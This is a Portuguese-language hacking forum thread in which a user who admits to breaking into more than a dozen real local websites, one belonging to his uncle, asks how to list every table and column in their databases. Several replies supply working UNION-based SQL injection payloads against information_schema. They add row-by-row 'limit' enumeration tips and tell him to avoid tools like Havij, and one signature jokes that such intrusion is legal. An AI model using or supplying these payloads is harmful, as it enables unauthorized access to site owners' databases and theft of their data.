Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Poder ver todas as colunas da tabela...

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Poder ver todas as colunas da tabela...

    Tipo, eu queria poder ver todas as colunas da tabela, mas todas mesmo, por exemplo :

    "../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(t able_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database()--"


    ta ae o site que to buscando as colunas, e de fato aparecem elas, porem nao aparecem todas, mesmo eu dando Control+U e verificando o codigo fonte so aparecem as mesmas que aparecem na pagina, elas estao em ordem alfabética, e as principais colunas estão pro final,

    ae voce pergunta, "mas como voce sabe que existem mais colunas?"

    bom, com o havij eu vejo todas as colunas, agora usando este metodo manual so consigo ver digamos 80%, as do finalzinho mesmo nao consigo ver, alguem sabe o codigo que uso para poder ver todas sem ter que usar o havij ou outro programa?
    se sim, por favor poste o codigo como ficaria, obrigado

  • Font Size
    #2
    Poxa mano ... tbm tenho essa dúvida. Eu tbm uso essa string que vc colokou ai em cima e nao aparece todas as tabelas...

    O mesmo acontece qndo quero pegar todas as colunas com o código:
    "...php?id= -10 union select 1,2,group_concat(column_name),4,5,6,7,8,9 from+information_schema.columns+where+table_schema =database()--"
    ...
    ... Sempre fui meu próprio mestre. E também era meu aluno favorito ...


    sigpic

    Comment


    • Font Size
      #3
      alguem ajuda ae galera , ja tem 2 membros com a mesma duvida, se o havij fez nos tb podemos uai... ou n

      Comment


      • Font Size
        #4
        me passa o site que voce está testando por favor.

        Comment


        • Font Size
          #5
          Postado Originalmente por 4linux- Ver Post
          me passa o site que voce está testando por favor.


          infelizmente nao poderei fazer isso cara, pq atravez deste site consegui acesso aos outros 13 todos acessados no mesmo servidor LOL, e sao todos da minha cidade e pah, e um é do meu tio kkkk era pedir pra fuder postando aqui

          Comment


          • Font Size
            #6
            Tente assim:
            Código:
            "../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database() limit 0,1--"
            Viu o final, onde adicionei "limit 0,1"? Aquilo serve para limitar o resultado a uma resposta por vez, na página 0 (C-Like, non Pascal-Like, ou seja, a contagem começa no zero).
            Assim você vai alterando:
            Código:
            limit 0,1
            limit 1,1
            limit 2,1
            limit 3,1
            E assim por diante, até obter todos os dados. Limite todos os seus requests a 1.
            Note que até mesmo o próprio Havij recebe um dado por vez.
            Mas com isso você está recebendo as tabelas, e não as colunas.
            Recomendo a leitura do meu tutorial para quem está acostumado com o Havij e quer mais informações sobre o SQLi manual (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).
            Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



            Notify-list · Twitter · Blog

            Nova lei: Invadir computadores protegidos é crime.
            Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

            Comment


            • Font Size
              #7
              perfeito como sempre 0kal. Parabens.

              Comment


              • Font Size
                #8
                Postado Originalmente por 0KaL Ver Post
                Tente assim:
                Código:
                "../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database() limit 0,1--"
                Viu o final, onde adicionei "limit 0,1"? Aquilo serve para limitar o resultado a uma resposta por vez, na página 0 (C-Like, non Pascal-Like, ou seja, a contagem começa no zero).
                Assim você vai alterando:
                Código:
                limit 0,1
                limit 1,1
                limit 2,1
                limit 3,1
                E assim por diante, até obter todos os dados. Limite todos os seus requests a 1.
                Note que até mesmo o próprio Havij recebe um dado por vez.
                Mas com isso você está recebendo as tabelas, e não as colunas.
                Recomendo a leitura do meu tutorial para quem está acostumado com o Havij e quer mais informações sobre o SQLi manual (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).
                nao teria espaco aqui: 0,1(espaco) -- ?
                ficando assim: 0,1 --

                Comment


                • Font Size
                  #9
                  Obrigado
                  Espaço? Pode ter, mas não é necessário.
                  É facultativo... Se você acha que com o espaço fica mais organizado, pode usar. Mas sem o espaço, o resultado é o mesmo.
                  Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



                  Notify-list · Twitter · Blog

                  Nova lei: Invadir computadores protegidos é crime.
                  Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

                  Comment


                  • Font Size
                    #10
                    Postado Originalmente por 0KaL Ver Post
                    Tente assim:
                    Código:
                    "../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database() limit 0,1--"
                    Viu o final, onde adicionei "limit 0,1"? Aquilo serve para limitar o resultado a uma resposta por vez, na página 0 (C-Like, non Pascal-Like, ou seja, a contagem começa no zero).
                    Assim você vai alterando:
                    Código:
                    limit 0,1
                    limit 1,1
                    limit 2,1
                    limit 3,1
                    E assim por diante, até obter todos os dados. Limite todos os seus requests a 1.
                    Note que até mesmo o próprio Havij recebe um dado por vez.
                    Mas com isso você está recebendo as tabelas, e não as colunas.
                    Recomendo a leitura do meu tutorial para quem está acostumado com o Havij e quer mais informações sobre o SQLi manual (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).


                    muito obrigado cara, ajudou bastante, porem nao deu certo com "group_concat", eu deletei o "group_" e deixei so o concat e foi

                    Comment


                    • Font Size
                      #11
                      Postado Originalmente por 0KaL Ver Post
                      Obrigado
                      Espaço? Pode ter, mas não é necessário.
                      É facultativo... Se você acha que com o espaço fica mais organizado, pode usar. Mas sem o espaço, o resultado é o mesmo.
                      ata, valeu, pensei que modificava algo.

                      Comment


                      • Font Size
                        #12
                        Só me esqueci de uma coisa:
                        O group_concat às vezes trava, quando a quantidade de tabelas é grande, por isso, eu (e até mesmo o Havij) evito usar.
                        Mas no exemplo acima, o problema pode também estar na falta do limit.
                        Código:
                        "../-null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database() limit 0,1--"
                        Sim!, até mesmo com group_concat, você precisa usar o limit.
                        Mas é como eu disse, é bom evitar. Se não der, parte para o concat() um a um mesmo.
                        Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



                        Notify-list · Twitter · Blog

                        Nova lei: Invadir computadores protegidos é crime.
                        Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

                        Comment


                        • Font Size
                          #13
                          ja tentou:

                          -null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(c olumn_name),17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns
                          n4sss@m4g1cl4b~#$I
                          just this.

                          Comment

                          X
                          Working...
                          X